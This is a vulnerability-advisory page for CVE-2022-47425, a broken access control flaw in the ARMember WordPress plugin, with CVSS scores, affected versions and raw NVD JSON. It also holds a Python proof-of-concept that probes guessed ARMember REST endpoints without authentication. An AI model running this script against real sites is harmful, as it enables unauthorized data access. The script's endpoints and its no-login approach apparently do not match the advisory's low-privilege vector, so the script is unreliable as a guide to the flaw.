Security Vulnerability Report
中文
CVE-2022-47425 CVSS 4.3 MEDIUM

CVE-2022-47425

Published: 2025-12-09 17:15:48
Last Modified: 2026-01-30 19:36:17

Description

Missing Authorization vulnerability in Repute Infosystems ARMember allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ARMember: from n/a through 3.4.10.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:reputeinfosystems:armember:*:*:*:*:lite:wordpress:*:* - VULNERABLE
ARMember < 3.4.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2022-47425 PoC - ARMember Missing Authorization # This PoC demonstrates accessing protected ARMember endpoints without proper authorization import requests import sys def exploit_armember(target_url, endpoint_path): """ Exploit missing authorization in ARMember plugin target_url: Base URL of the WordPress site endpoint_path: Protected endpoint path to access """ # Target protected endpoints that require admin privileges protected_endpoints = [ '/wp-json/armember/v1/member-levels', '/wp-json/armember/v1/user-profile', '/wp-json/armember/v1/access-control-settings', '/?rest_route=/armember/v1/members/list' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } print(f"[*] Testing ARMember endpoint access without authorization...") print(f"[*] Target: {target_url}") for endpoint in protected_endpoints: url = target_url.rstrip('/') + endpoint try: # Send GET request without authentication response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f" Status: {response.status_code}") print(f" Response: {response.text[:200]}...") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {endpoint}") else: print(f"[*] Unexpected: {endpoint} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python exploit.py <target_url>") print("Example: python exploit.py http://example.com") sys.exit(1) target = sys.argv[1] exploit_armember(target, "")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-47425", "sourceIdentifier": "[email protected]", "published": "2025-12-09T17:15:47.830", "lastModified": "2026-01-30T19:36:17.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Repute Infosystems ARMember allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ARMember: from n/a through 3.4.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:reputeinfosystems:armember:*:*:*:*:lite:wordpress:*:*", "versionEndExcluding": "3.4.11", "matchCriteriaId": "DBD5629B-5B41-41CD-B479-F1F39A8281F6"}]}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/armember-membership/vulnerability/wordpress-armember-membership-plugin-content-restriction-member-levels-user-profile-user-signup-plugin-3-4-10-broken-access-control?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}